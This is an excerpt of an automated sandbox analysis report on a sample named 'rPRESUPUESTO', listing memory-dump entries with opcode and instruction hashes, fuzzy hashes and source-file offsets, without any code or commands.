                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction ID: 7eedff193bd16933748bf5204730b6a1d49b5c88c11c3d51b5d804a52ff76d39
                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                • Instruction Fuzzy Hash: D22106B5A00B099FD3A0CF29C440B52BBF4FB48B10F10492EE98ACBB40E371E814CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction ID: 4f9ae41b85da67565a99b579b5d3246f25d6bb07613d37294315943b2b624c94
                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                • Instruction Fuzzy Hash: FC119E32600609EFE7619F48CC44B56FBE6EB55755F098429EE09DB260DB31DF40DB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d20954f9f3c651ed1106da8490da46690503b0ec4a0fdb7da9ae1fb1ecbed280
                                                • Instruction ID: dd7b053a1816860ae2c53e9a002a5d7729497fef3646b71c3c5da4230c87b9c1
                                                • Opcode Fuzzy Hash: d20954f9f3c651ed1106da8490da46690503b0ec4a0fdb7da9ae1fb1ecbed280
                                                • Instruction Fuzzy Hash: 63012B313456496FE316926DDC9CF27BBDCEF80354F0900A8FA40CB391DA14DD00C2A1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0ea9ef2dfe6f2ac789b498f1c52e2859f2134b317bc793b03611c9597b4789c
                                                • Instruction ID: 354021c7e87b421eb2bc1541d3ad6f9e38e26a81e159496519ae08d830375115
                                                • Opcode Fuzzy Hash: d0ea9ef2dfe6f2ac789b498f1c52e2859f2134b317bc793b03611c9597b4789c
                                                • Instruction Fuzzy Hash: A311C276240649AFEB25CF59D944F56BBB8EB85B74F064119F9069BA50C370E800CF60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60e15e8429315ae680f5af660242ba2571d8a42e7ae45aa281f87a3bf7c2cf5f
                                                • Instruction ID: b2e6c9dd1590eb0fe2ffb34ab622d41433be5995edd52e9dd012d824972576c9
                                                • Opcode Fuzzy Hash: 60e15e8429315ae680f5af660242ba2571d8a42e7ae45aa281f87a3bf7c2cf5f
                                                • Instruction Fuzzy Hash: E0110632200601DFEB21DAADD844F17F7A5FFC4311F594419E642C7290DA70AA03CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4648f2a3110240c68ccc894d8e729d363c01ec2b91d9d692315b82589cd919b5
                                                • Instruction ID: f7f5a61e06285da1895b00a0b6e28813ab847b22192c11b42c885475ad51871e
                                                • Opcode Fuzzy Hash: 4648f2a3110240c68ccc894d8e729d363c01ec2b91d9d692315b82589cd919b5
                                                • Instruction Fuzzy Hash: 6A11C272A00719EBDB62DF59CD80B5EFBB8EF48750F640459DA11E7284E730EE118B60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f297f68c8ed6e2d7e3a0c9d20a9b0ce861a9b86e7f1d3dbcce9aac139d24ba81
                                                • Instruction ID: 54fad031dde3548348d94b4e23d77d2d49847e7e2050847477fd3bd785a29ccb
                                                • Opcode Fuzzy Hash: f297f68c8ed6e2d7e3a0c9d20a9b0ce861a9b86e7f1d3dbcce9aac139d24ba81
                                                • Instruction Fuzzy Hash: E2016D716002099FCB259B19E448E26FBF9FB95714F25817EE2058B664CA70AE46CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction ID: 1f93b26b2124e1a8471085a6501269e8559a6307c17faeb0d0d82e9512a24ce1
                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                • Instruction Fuzzy Hash: AB11C6716016C69BE722971C894CB25B7D4BB80748F1E00E4DF41C7792F728CA42C2D2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction ID: 4409b90c826066db06505625c8c157c7dffbada0bf2627b784e8ab079e7d2ef4
                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                • Instruction Fuzzy Hash: 0501D232600509AFE7619F58CD44F5AFFA9EB45754F058064EE09DB260E771DF40C790
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction ID: 2204271e06aa5975f076622b2025510af543573a6540b2b1127e9dff5ac66e08
                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                • Instruction Fuzzy Hash: B40126324087399BDB318F19D840A32BBF6EF99B66700852DFC958B281E331D400CB60
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f52050f635acf3f089234a227fde2ce3d633fb90dc4e1094f10d005683042ad
                                                • Instruction ID: d9e4b21f685b6e81e69d898d93e58c4c712decb9fdd216fe6c0d29c5bb3462e8
                                                • Opcode Fuzzy Hash: 9f52050f635acf3f089234a227fde2ce3d633fb90dc4e1094f10d005683042ad
                                                • Instruction Fuzzy Hash: E60104325412019FEB32DF1C8804E12B7E8EB85370B6D4265E968DB1B6D770DE21CB80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d013f92a8b8eea062c5cbb522f5da640f74e48b5462d4074e2106d4e7791fcf3
                                                • Instruction ID: 599fbde54f468bb42f72a56b3e17c6bdc8971b1ac0eddb6bb01320426cec69be
                                                • Opcode Fuzzy Hash: d013f92a8b8eea062c5cbb522f5da640f74e48b5462d4074e2106d4e7791fcf3
                                                • Instruction Fuzzy Hash: 7A11A132241645EFDB15EF19CD94F16BBB8FF54B44F2400A5F905DB661C635EE01CA90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36c4631cfc62dfd94943412c0e203b535fa1ad7e7a14bd154bb70b51680d2838
                                                • Instruction ID: 12a7958d83a43c03d4eb88af87d32ad94c48679788b5ebe17c28ec00c0762f59
                                                • Opcode Fuzzy Hash: 36c4631cfc62dfd94943412c0e203b535fa1ad7e7a14bd154bb70b51680d2838
                                                • Instruction Fuzzy Hash: 90115E7154121DABDB25EB68CD41FE9B2B9BF04710F6041D4A315E61E0D770AE81CF85
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50f48ab0b98522c0b0fc1a045b46b20b0f6eef2a87f72b36d25005e9b5f4657a
                                                • Instruction ID: 74ba7c56fda24807191e2b82342a5b9d1e1381cc4feabf42b4018bb6d468ca23
                                                • Opcode Fuzzy Hash: 50f48ab0b98522c0b0fc1a045b46b20b0f6eef2a87f72b36d25005e9b5f4657a
                                                • Instruction Fuzzy Hash: 37111B7390011DABCB11DB94CC84DDFBBBCEF48358F044166A906E7211EA34AB55CBA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction ID: dff865ee1a2afbf71926f1b3063e9621f121d1e430a3128bdc7a0a6af0d9589e
                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                • Instruction Fuzzy Hash: 760128322001148BEF128A2DD884B52F777BFC4700F5941A5EE01CF247DA71CC82C7A0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cb876a096999d69adad3367940d76b689922d5956c28944b099b8f157457650c
                                                • Instruction ID: a989565bb55996fa61c49951d55d5feb686ea3530e7e8b171c0710edd41e77be
                                                • Opcode Fuzzy Hash: cb876a096999d69adad3367940d76b689922d5956c28944b099b8f157457650c
                                                • Instruction Fuzzy Hash: 2001F271240705AFD3315B19D844F12BEE8EF59F50F11882EB706DF3A4D6B0DA418B54
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3998f77f580455cdd8344cd9a0ed2ec95c1a191db2e0fc379795981cd8c10f35
                                                • Instruction ID: 9c573ccbcf987e885c49a3dabc303c05827bbc2663e16f26ab08d2b961b37b7d
                                                • Opcode Fuzzy Hash: 3998f77f580455cdd8344cd9a0ed2ec95c1a191db2e0fc379795981cd8c10f35
                                                • Instruction Fuzzy Hash: 08F0F432A41B24B7C7329B5A8C44F57FFF9EB88B90F144068E60697650CA30ED01DAA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction ID: 1e65bc32b947b38d462c35bfb9c52da347a49826fe552fc50d20bfac3fdd6315
                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction Fuzzy Hash: C1F0AFB2A00615ABD325CF4D9C40E67FBEADBD5A80F048128A609CB320EA31DD05CB90
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction ID: 78d544aeaf8cbd74721e2484c41112b191f4239438ca2b24de15ae385253299f
                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                • Instruction Fuzzy Hash: A9F0C233204A239BD73356599844B2BEE958FD5F64F1A007EF30E9B248CA648D0297D2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbd68e15921d7f231e40a7b19e28ddce09ebb31519deb5602cb3e1c64923c152
                                                • Instruction ID: 76c2e0b507b5b1c0d78936ca6d90e63508ae06528cdb939620383f5decbf7a76
                                                • Opcode Fuzzy Hash: dbd68e15921d7f231e40a7b19e28ddce09ebb31519deb5602cb3e1c64923c152
                                                • Instruction Fuzzy Hash: 3D012C72A1020DAFDB04DFA9D955AAEB7F8FF58304F14406AE904E7354D6749A01CBA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c80a6ec2128d6b4b4a48349f421f99b3c16bc5eb35877404f3fe05f638e03d6
                                                • Instruction ID: 2b0fc5a3c6212413612fd13a342f85e05c3ef863d032a0bbc3eb6ab2433a1bf3
                                                • Opcode Fuzzy Hash: 6c80a6ec2128d6b4b4a48349f421f99b3c16bc5eb35877404f3fe05f638e03d6
                                                • Instruction Fuzzy Hash: C9014FB1A0020DEFDB04DFA9D545AAEBBF8FF58304F54406AF914E7394D6749E018BA1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 877696b54d2370ae37f5d51ad2a301543f9c9e8ea7f435599da0f367ad507512
                                                • Instruction ID: 5039577f1b836ba70f1f8e872f60b0ef0a488bf7216d94ad84cc24dab6f7b706
                                                • Opcode Fuzzy Hash: 877696b54d2370ae37f5d51ad2a301543f9c9e8ea7f435599da0f367ad507512
                                                • Instruction Fuzzy Hash: A2017C71A0020EAFDB04DFA9D441AAEB7F8EF58304F14406AF900E7394D674AA00CBA0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction ID: a64f219370cfa29a260c7e77ed8ca07a034c997f20d89a68288c7d4e4a1d6cee
                                                • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                • Instruction Fuzzy Hash: E501F43260168D9BD363DB6DC849F59BBD8EF42758F0841E5FA04DB6A1DB79CA80C211
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8f5e48e38e0391205d268cbe4d051a2dcc08de1dbdd8845a43657281a0bb7fc
                                                • Instruction ID: a04e7c1f81280fe3b27ad96d73cbaf9006e1f109cd7a7cb7faa6c8c200d08879
                                                • Opcode Fuzzy Hash: d8f5e48e38e0391205d268cbe4d051a2dcc08de1dbdd8845a43657281a0bb7fc
                                                • Instruction Fuzzy Hash: AF014F71A0024D9FDB04DFA9D545AEEBBF8BF58314F14405AE901E7284E774EB01CB95
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction ID: 184c69d842685d894baef0e6ce03212fdc124665cf79daf6be7b5b4040b3c18d
                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                • Instruction Fuzzy Hash: 24F0127210001DBFEF019F94DD80DAF7BBDFB593D8B104125FA1192160D631DE21A7A0
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: efb4c5b931919e4d7af6ecc68ad063f05627f23249d76d758deb7a1896fef90b
                                                • Instruction ID: 7349ac58b928ddfd406587af81ffa6a82085d66e22fc4fefbb3902a50d7d3fd3
                                                • Opcode Fuzzy Hash: efb4c5b931919e4d7af6ecc68ad063f05627f23249d76d758deb7a1896fef90b
                                                • Instruction Fuzzy Hash: 7B018936100109AFCF129E88D880EDA3F66FB4C758F058201FE18A6220C336DA70EF81
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d67f54f3039d7b7271c7dd69a5c8041fc4819713be74e3848d9e4c0020b3bd60
                                                • Instruction ID: fbce810390d1a001aed6675df55635bde0e5d78c69da2eef16440d01a4d10d9d
                                                • Opcode Fuzzy Hash: d67f54f3039d7b7271c7dd69a5c8041fc4819713be74e3848d9e4c0020b3bd60
                                                • Instruction Fuzzy Hash: BAF024B13082415FF31A961E8C01B32B29AE7C0B50F7980BEEB0D8B2C1F971DC0183A4
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7794b3c0a7ef1c96ca25029bff786bc32d902b4cd3a7a6ac84c22467f26187bc
                                                • Instruction ID: 7524e222c0e6d56fe1682996584c3c52b07a0eaf49e344efc07a25b615513cf9
                                                • Opcode Fuzzy Hash: 7794b3c0a7ef1c96ca25029bff786bc32d902b4cd3a7a6ac84c22467f26187bc
                                                • Instruction Fuzzy Hash: 9D018C7020168D9FE7639B6CCD48F2537E8BF44B04F5801A4BA11DBADAEB29D6418610
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction ID: 8e6739e3a850f605825cd0e88e45c3c1ac49b7648b3f378fdd83d07c7b2dcd61
                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction Fuzzy Hash: 78F08235341E1347EB76BA2E9824F3BAA95AF90B50B05053D9659CB6C0DF60DE018790
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2f100481952033c5c25c1792de4b222c774674215cbe7958c3009050c568c76a
                                                • Instruction ID: cc5135a2e623435f5bfc2e016804c4f8338937f1379cea08b64c7dd708281514
                                                • Opcode Fuzzy Hash: 2f100481952033c5c25c1792de4b222c774674215cbe7958c3009050c568c76a
                                                • Instruction Fuzzy Hash: 7EE092321006549BC321FB2ADD05F9AB7EAEF64360F114525B116575A4CB30A910C794
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction ID: fe7b71c1c7b9d3135260a42f55297490e2f8472ae3941797c2bca7b7235149ae
                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction Fuzzy Hash: 2AD0C936100248ABCB019F41C890D9AB72AEB98610F108019B919077118A31A962DA50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction ID: 4a5c5d3b20ce2e09a354f22e18fc0e6a0b0ca7e9a909a11f62a7d262c71a92ef
                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                • Instruction Fuzzy Hash: 07C04879711A468FDF16DB6AD298F49B7E4FB48740F1508D0E805CBB22E624E981CA10
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cafbd52be85449c7a347717305adf9efe75346cce059e40f0b2fbdbef03257a3
                                                • Instruction ID: a923d1af02283242c56a95d1f77790fd1367d7385bac18bd70aeb677362ec4a8
                                                • Opcode Fuzzy Hash: cafbd52be85449c7a347717305adf9efe75346cce059e40f0b2fbdbef03257a3
                                                • Instruction Fuzzy Hash: EE900231605810169541715848855464045A7E1301B55C011E5438554CCE148B9A5362
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5752e5cf3484a01f5feb68733598987c111eb91c19a4f0312456f4f0250b6c75
                                                • Instruction ID: 609f1dfb2b3b9f99ad09f2bebf62e10c5963d5d9ebcfe2d6aa1f268be67f1f20
                                                • Opcode Fuzzy Hash: 5752e5cf3484a01f5feb68733598987c111eb91c19a4f0312456f4f0250b6c75
                                                • Instruction Fuzzy Hash: 5E900261601510464541715848054066045A7E2301395C115E5568560CCA188A99936A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99ff4b6d3b0b6cf83487af2e2dd0d3e872aee83b8d1669bee56c64e5cd3d096c
                                                • Instruction ID: 560123684af33e38cf64cf2c8c6aa46f8fac9693156756b53da4abe9ff328d99
                                                • Opcode Fuzzy Hash: 99ff4b6d3b0b6cf83487af2e2dd0d3e872aee83b8d1669bee56c64e5cd3d096c
                                                • Instruction Fuzzy Hash: 0E90023120141806D50571584805686004597D1301F55C011EB038655EDA658AD57232
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 844e50f69ac2dba55915a6c0a551ef6c5da5ce557c31d2f4d45f263b6f60b103
                                                • Instruction ID: 6225365ee3691146d26b3fd4fc4875604f41283403c0b3b1fbfec3f2ee95ca4b
                                                • Opcode Fuzzy Hash: 844e50f69ac2dba55915a6c0a551ef6c5da5ce557c31d2f4d45f263b6f60b103
                                                • Instruction Fuzzy Hash: EE90023160541806D55171584415746004597D1301F55C011E5038654DCB558B9977A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff3b86dc7789d5c4c40c868fd5990806e4a92e9a80132d749271452877cfce15
                                                • Instruction ID: 68ad7d84ada682cd0181d428630341b39df23fdf48f3446cb15d4d2f21d5d8d8
